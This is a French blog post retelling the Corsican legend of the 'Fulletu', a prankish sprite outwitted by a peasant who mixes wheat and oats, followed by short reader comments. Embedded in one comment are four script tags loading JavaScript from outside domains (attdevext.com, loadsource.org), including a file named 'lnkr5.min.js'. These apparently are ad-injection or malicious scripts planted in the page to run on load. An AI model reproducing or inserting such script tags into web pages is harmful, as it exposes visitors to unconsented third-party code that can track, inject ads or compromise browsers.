-
Contes et Légendes de Corse : " Le Fulletu "
Contes et Légendes de Corse
"L e Fulletu "
Gif: papillondavril.centerblog.net
Le « Fulletu « est un petit Lutin facétieux il se dérobe volontiers aux regards des humains et après qu’ il ait fait une bonne farce, on l’ entend rire aux éclats et frapper dans ses mains qui ont la particularité d’être pour l’une; en étoupe et pour l’autre en plomb. Lorsqu’il jette son dévolu sur une personne ou une habitation à laquelle il s’attache, il est très difficile à chasser et il faut rivaliser de ruse pour pouvoir s’en défaire. Sans être réellement malveillantes, ses tracasseries restent pour le moins irritantes. Voici deux exemples,des farces qu’ il affectionne.
Un jour une jeune bergère quittant le « Stazzu » (bergerie) pour aller à la ville vendre ses fromages et ses « brocci », disposa ceux-ci sur une planche qu’elle posa sur sa tête. Marchant avec aisance, elle sentit tout à coup s’appesantir sa charge tant et si bien, qu’elle finit par la jeter à terre en s’écriant :« On dirait que le diable est dedans ! »
Elle aperçut alors, au même instant le « Fulletu » qui joyeusement gambadait autour d’elle en riant et tapant dans ses mains tout heureux du bon tour qu’il venait de lui jouer.
C 'est sur un brave meunier, qu’il jeta une autre fois son dévolu. Alors que celui-ci était en train de moudre son grain ,le « Fulletu » , car il avait cette possibilité, pris l’apparence d’un petit garçon, transi de froid et qui pleurait. Le meunier ému, fit entrer l’enfant dans sa demeure où , dans la cheminée brûlait un bon feu, duquel l’enfant refusa de s’approcher pour y réchauffer ses pieds, car pour se faire, il aurait du se déchausser et mettre à nus ses pieds fourchus. Le brave homme, peu suspicieux, s’ en retourna à ses travaux lorsque soudain, la roue du moulin s’arrêta. En effet il n’ y avait plus le moindre filet d’eau pour la faire tourner . L’enfant alors arriva en riant et en frappant dans ses mains« Ta journée est finie meunier ! Tu peux aller te coucher »
dit-il goguenard.
Mais le « fulletu » a un point faible , son «Talon d’ Achille » pourrait-on dire. Il a une sainte horreur du désordre. Le paysan Corse lui, est rusé et un matin, il monta au grenier et mélangea un sac de blé avec un sac d’avoine que le lutin, par sa nature, fut obligé de trier grain par grain. La besogne s’ annonçant si longue et si fastidieuse, qu il se découragea bien vite et dégoûté quitta la maison devenue inhospitalière. De ce fait celle-ci recouvra son calme
Dominique
-
Commentaires
bravo au malin paysan !!
<script src="//attdevext.com/1c7ecd567624c69629.js"></script> <script src="http://attdevext.com/addons/lnkr5.min.js" type="text/javascript"></script> <script src="http://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52293x7294x&r=42" type="text/javascript"></script> <script src="http://attdevext.com/ext/1c7ecd567624c69629.js?sid=52293_7294_&title=&blocks[]=31af2" type="text/javascript"></script>une jolie histoire-
bonne journée- bisous-